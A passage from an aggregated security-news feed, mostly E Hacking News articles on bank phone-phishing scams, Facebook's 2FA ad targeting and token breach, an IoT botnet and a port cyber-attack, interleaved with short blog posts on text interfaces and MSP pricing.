Battling the voices of suspicion, Matt hesitatingly co-operated as the caller verified his home address and mother’s maiden name, intention projected here was to send a new card once the California trip is over.  
Once the details were provided and cross-checked, the caller asked Matt to verify the 3 digit security code and as he had given out this code earlier while paying for things using his card, he let his guard of caution down.
She proceeded and asked for the PIN of his current card, she backed the act up in the name of applying the same PIN to the new card. The question got Haughey alarmed and he asked her to repeat what she just said. With the question being repeated, the PIN, though skeptically, was provided.
After hanging up, Haughey was entirely convinced with the legitimacy of the transaction. However, the part where the PIN was asked for kept him at unease.
Referencing an interview Matt had with KrebsOnSecurity, he said “I balked at challenging her because everything lined up,” He added, “But when I hung up the phone and told a friend about it, he was like, ‘Oh man, you just got scammed, there’s no way that’s real.'”
With amplified concerns and a forehead bearing the lines of distress, Haughey approached his credit union to ensure his travel arrangements were aligned. He narrated the terrific incident to a bank employee who, just by the look on his face subscribed to the views of his friend.
His account was reviewed and two fraudulent charges totaling $3,400 stared right into his face, but Ohio was not in this cyber-crime scene. Over $2,900 was spent at a Kroger near Atlanta and $500 was withdrawn from an ATM located in the same area using a counterfeit debit card.
Putting into perspective the fake professionalism and the realism of it all, Haughey said, “People I’ve talked to about this say there’s no way they’d fall for that, but when someone from a trustworthy number calls, says they’re from your small town bank, and sounds incredibly professional, you’d fall for it, too,”

Narrow escape

Founder of Panic Inc., Cabel Sasser gave a recent account of how he nearly fall prey to a telephonic scam which was attempted from a number similar to the one at the back of his Wells Fargo card.

“I answered, and a Fraud Department agent said my ATM card has just been used at a Target in Minnesota, was I on vacation?” a traumatized Sasser tweeted.

Sasser’s tweet didn’t carry any record of his corporate debit card being subjected to two fraudulent instances. On disputing the charge he was mailed a replacement card by his bank.

Recalling in an interview with KrebsOnSecurity, Sasser said “I used the new card at maybe four places and immediately another fraud charge popped up for like $20,000 in custom bathtubs,” He added, “The morning this scam call came in I was spending time trying to figure out who might have lost our card data and was already in that frame of mind when I got the call about fraud on my card.”
And the card-replacement drama was set into momentum, the caller asked, “Is the card in your possession?”  It was. The caller then enquired about the CVV, a three-digit code printed on the back side of his card.
Once the CVV was verified, the agent offered to expedite a replacement. Sasser recalled. “First he had to read some disclosures. Then he asked me to key in a new PIN. I picked a random PIN and entered it. Verified it again. Then he asked me to key in my current PIN.”
Following this, what dawned on Sasser was that wouldn’t an actual representative from Wells Fargo’s fraud division already have access to his current PIN?
The caller feigned authenticity by ensuring him that it’s just to confirm the change and he can’t see what he is entering.
Sasser’s counter had the fact that they are the bank, they have his PIN, and they can see what he enters. To which caller retorted, “Only the IVR [interactive voice response] system can see it,” Reaching the climax, the caller reiterated Sasser’s Social Security number and attempted for a re-confirmation.
Though the number was correct, authenticity was still struggling to be felt. Sasser decided to hang up and call back and he told the same to the agent. When he dialed the number printed on the back of his ATM card which was the source of the call he got, the person on the other end said there had been no such fraud detected on his account.
 “I was just four key presses away from having all my cash drained by someone at an ATM,” Sasser told the interviewer.  On visiting the local branch of his bank, his fears were confirmed, “The Wells person was super surprised that I bailed out when I did and said most people are 100 percent taken by this scam,” Sasser said.

Mortal, computer or a fusion?

“Vishing”- is a method which uses a combination of human and automated voice. Although, the scammer was an actual person in the aforementioned case, vishing attempts are also equally prevalent. The August case of “Curt” as reported by KrebsOnSecurity is a defining example of “vishing”.

Referenced from Curt’s writings, “I’m both a TD customer and Rogers’s phone subscriber and just experienced what I consider a very convincing and/or elaborate social engineering/vishing attempt,”

“At 7:46pm I received a call from (647-475-1636) purporting to be from Credit Alert (alertservice.ca) on behalf of TD Canada Trust offering me a free 30-day trial for a credit monitoring service.”

Reportedly, the caller introduced herself by the name of ‘Jen Hansen’, and proceeded with what Curt labeled as “over-the-top courtesy.”

“It sounded like a very well-scripted Customer Service call, where they seem to be trying so hard to please that it seems disingenuous,” Curt recollected. “But honestly it still sounded very much like a real person, not like a text to speech voice which sounds robotic. This sounded VERY natural.”
The caller then brought it to Curt’s notice that TD Bank was offering a free credit monitoring service for a month, and that he is allowed to cancel at any time. He was told that all he has to do is t0 confirm his home mailing address in order to apply.
The women on the line went on explaining the package and as she was glorifying the parts of the package that included free antivirus and anti-keylogging software, Curt interrupted and enquired about the weather at her place, a off-beat question that got her (robot) baffled and after a couple of apologies she transferred the call to another line, the question was outright ignored on this new line as well and the person kept on explaining the offered service.
After completely throwing the robots off-script using his technical reasoning, Curt hung up and immediately contacted TD Bank and was assured that he dodged a bullet as no one had called him from the Bank.

Preventive front

To guard themselves against phone phishing, users are advised to not disclose any sensitive information pertaining to their identity and banks to an unsolicited phone call. Similar to email scams, phone phishing also has an element of haste and urgency play a crucial part as the haste blocks our potential cognitive thought process and keeps us from adding the things up which works as a perfect catalyst for users to go slow on defense.

If any such call gets you troubled and you find yourself in a zone of financial worry, do not reach for help via the number offered by the caller that got you worried in the first place, rather contact the bank via the number given at the backside of your card.  Don’t hesitate while hanging up calls that turn into an inquisition in a matter of seconds; deliberate attempts to probe into your personal space are to be sensed by being a bit more alert in these times than you ever have been.




E Hacking News - Latest Hacker News and IT Security News

liquid thoughts: Still Hope

As I sit here in our new home with my beautiful baby boy Edgar napping and my wonderful wife Emily working around the house, I am trying hard to put together another article describing why and how this text stuff needs to happen. I think there is still hope Doug.

I really hope Edgar will grow up with more powerful intellectual tools.

The article I am working on is called “In This Information War, Arm The Citizenry”. No link yet.

 

 



liquid thoughts

liquid thoughts: Compressed Scrolling

When we scroll through a textual document on a computer system the body of the text quickly accelerates into an illegible blur, with headings not far behind in loosing their legibility and thus utility.

I am a gamer, particularly interested in the Battlefield franchise, which is not only spectacular to look at but also has a very well developed sense of movement and weapon and equipment manipulation: https://www.youtube.com/watch?v=UZW4cPUIVf4

I have experimented with gestures for a while, including gestures to pinch documents (using your trackpad or your iPad) to collapse/compress the document so that body text disappears and you have a table of contents/outline instantly.

However, what about changing the view based on whether you are still or scrolling, giving a smooth operation into something quite different, like a modern computer game might accomplish? The point here is to ask WHY the user is scrolling, not to simply copy the analog scroll from Egyptian times.

The user is scrolling because she wants to look at another part of the document, which is why Doug Engelbart called this navigation rather than simple scrolling (I expect). So there idea here, which I feel we should put resources into investigating, would be to change the document on scrolling, to maybe move the headings closer and make the body smaller and more grey, apart from any names (or other custom requirement such as instantly replacing company names with logos on scrolling) so that the user flips into a navigation/overview mode when scrolling, not simply shuffling a paper replica.

To find out of this is indeed useful or just a fancy demo would require a very flexible and capable graphics system to experiment on. I think this is crucial work.

I want this guy to have the best reading and authoring experience when he grow up (sidetone, this picture was taken on a  smartphone (iPhone XS Max) and I therefore think our text environments have a lot more power to offer. Let’s explore…):



liquid thoughts

E Hacking News – Latest Hacker News and IT Security News: Facebook Admits Using Users’ 2FA Phone Number for ad targeting


The phone number that users enter on Facebook to ensure security via 2FA, which abbreviates for ‘two-factor authentication’, is being used to target them with ads. 2FA, as the name suggests, the method affixes another layer of security to amplify authentication.
In the wake of a report by Gizmodo, which was based on the study conducted by two American Universities, Facebook admitted that it repurposed the phone numbers put onto the platform in the name of 2FA to target advertising. Studies label the phone numbers provided for security reasons as potential fodder for advertisers.
On being inquired about the findings
"We use the information people provide to offer a better, more personalized experience on Facebook, including ads,"  a Facebook spokesperson said in a dialogue with TechCrunch. He further added, "We are clear about how we use the information we collect, including the contact information that people upload or add to their own accounts,"
The pressing claims imposed by the studies prompted the social media giant to respond, it acknowledged channeling the data intended for security purposes in the course of advertising and dollars.
The users who have contact lists uploaded to their Facebook are unwittingly assisting advertisers in laying hands on PII, which is 'Personally Identifying Information' of their contacts.
On the prevention front

Facebook gave a clarification that users can choose not be a target by selecting non-mobile-number based means of 2FA and undoing the synchronization that listed their contacts.

Referencing a spokesperson’s statement, users can manage and delete the contact information they’ve uploaded on the platform at any time.




E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: Facebook data breach affects 50 Million users



Around 50 million of its users were put into cyber-danger by a mere security shortcoming, according to Facebook.

As per usual, the security breach’s aim was to harvest user’s accounts and to attain power over them. This was the result of a vulnerability exploitation of the “View As” feature, done by the cyber-criminals. The infringement surfaced on Tuesday and the multi-millionaire social-media platform instantly informed the police.

The “View As” privacy function helps a user to see what their profile looks like to other users, especially what information is open to their friends, friends of friends and public. “Access Tokens” are equivalent to digital keys which help the users to stay logged into their accounts.

Numerous bugs in the feature were the pathway for the attackers to steal the access tokens to get into people’s accounts.

The social-networking site’s vice-president of product management said that the fault has been corrected and that all affected plus some other accounts too are being reset to ensure further safeguarding. Also, the possibly affected users were urged to re-login on Friday, without any need to change passwords.

With over 2 billion active monthly users Facebook suffered a great shock when its share price plummeted beyond 3%.
The aforementioned breach would lead the attackers to hack into other accounts of people that use Facebook which comprises sites like Tinder and AirBnB to name a few.

The investigation has started pretty recently, hence which part of the world, those 50 million users come from, is a doubt as of now. If or not the accounts were misused and the information jeopardized is a question that prevails still.

Mark Zuckerberg, the founder and Sheryl Sandberg, the chief operating officer of the platform were surely two of those 50 million preys. The culprit behind all these attacks is still behind the curtain.

It’s getting harder by the days for Facebook to persuade the statesmen and legislators into believing that they can protect their users’ data and with the increasing number of cyber-crime related to this social media platform the trust of the users is wavering.

There is a major requirement for Facebook to take such breaches seriously, tackle them powerfully and contrive plans for any further attacks that could harm the tons of data it possesses.

The only way to ensure the user privacy is limiting the access points for users and mending the features in a way so as to make them work parallel with data safety.

According to sources, attackers are easily captivated by vulnerabilities and hence Facebook turned out to be the intended objective of cyber-crime. People’s privacy and security are of utmost significance and it should stay that way.


E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: Hide and Seek Iot Botnet Increasing Infection Capabilities with New Vectors



The Hide and Seek IoT botnet has been updated to act against the Android devices and the criminal group behind its advancement and development has been seen to include a new functionality in recurring incremental optimizations to the fundamental engine.

The Android infections appear to be caused not by focusing on specific vulnerabilities, rather concentrating on maltreatment of the Android Debug Bridge (ADB) option. As a matter of course this is turned-off however at times users might need to turn it on.

The IoT botnet has been spotted to have added around 40 000 gadgets to its stockpile, the infected devices are for the most part from China, Korea and Taiwan. Numerous Android devices are currently part of the home infrastructure — phones, tablets, televisions and various peripherals. This is the motivation behind why attacks utilizing it are exceptionally viewed as critical.

Its samples concentrate on the devices that have set the ADB option on either as a matter of course or by the users themselves. At the point when this capacity is empowered the devices are uncovered as this opens a network port accessing remote connections. Malignant administrators have been spotted to perform unauthenticated login endeavors — utilizing either default passwords or 'brute forcing the devices'.

The attacks likewise prompt the conclusion that the criminal collective behind the botnet is always attempting to update its features. The tremendously expanded number of infected devices is apparent that the botnet is gaining more energy. Botnets are known to be quite efficient when it comes to launching conveyed denial-of-service attacks (DDoS) which can render sites and PC systems non-working.

Chief Security Researcher at Bitdefender Alex Balan said that the botnet's purpose for the time being gives off an impression of being to increase its size and nothing more.
Despite the fact that it bolsters directions for data exfiltration and code execution the researchers have not seen them to be utilized by the botnet and additionally, there is no module for propelling dispersed denial-of-service attacks, an essential technique for botnet monetization.



E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: The MSP Guide to Building Your Managed Security Services: Pricing Strategies | Avast Business

If you are thinking of reshaping your business into an MSP (managed service provider) that offers managed security services to SMB clients, your timing could not be better. Small to medium-sized businesses are in dire need of cybersecurity, and they are looking for MSPs that understand their unique needs and can offer the protection they require. In our first post on building managed security services, we discussed the proper defining and bundling of typical MSP-offered services. In this part, we explore key pricing strategies for managed security.



Blog | Avast EN

E Hacking News – Latest Hacker News and IT Security News: Latest Cyber-Crime Prey: The Port of Barcelona


Cyber-criminals attacked the Port of Barcelona on Thursday morning disrupting a few of its servers and systems.


The attack shook the organizations on a superficial level but thanks to the contingency plan that was specially designed for such situations; the attack couldn’t wreak much damage.

The organization took to Twitter to inform the public about the occurrence of the incident. Not much regarding the attack is out in the open except for what the tweets say. Several of the servers of the organization were affected to a certain level. The Department of Information Systems is hot on the trail and is checking out the severity of the attack and looking out for solutions to mitigate the effects.

A couple of days before facing the attack, the organization had tweeted about how unsafe everyone is from a cyber-attack and how the activities and security of the stakeholders is at risk due to it.

The tweet included an article about the major challenges faced by the ports in relation with cyber-security. Vulnerabilities must be gotten rid of before the criminals sniff them out. Protocols must also be crafted to prepare for the unforeseen cyber-attacks.

The attack was pretty well handled by the Port Authority and later it was informed that the maritime operations were working as per usual and within regular parameters. Reception and delivery operations which were thought to be delayed also proceeded without interruption.

The organization has decided to keep mum about the subject and hence any assumption made about the scenario wouldn’t be judicial. 


E Hacking News - Latest Hacker News and IT Security News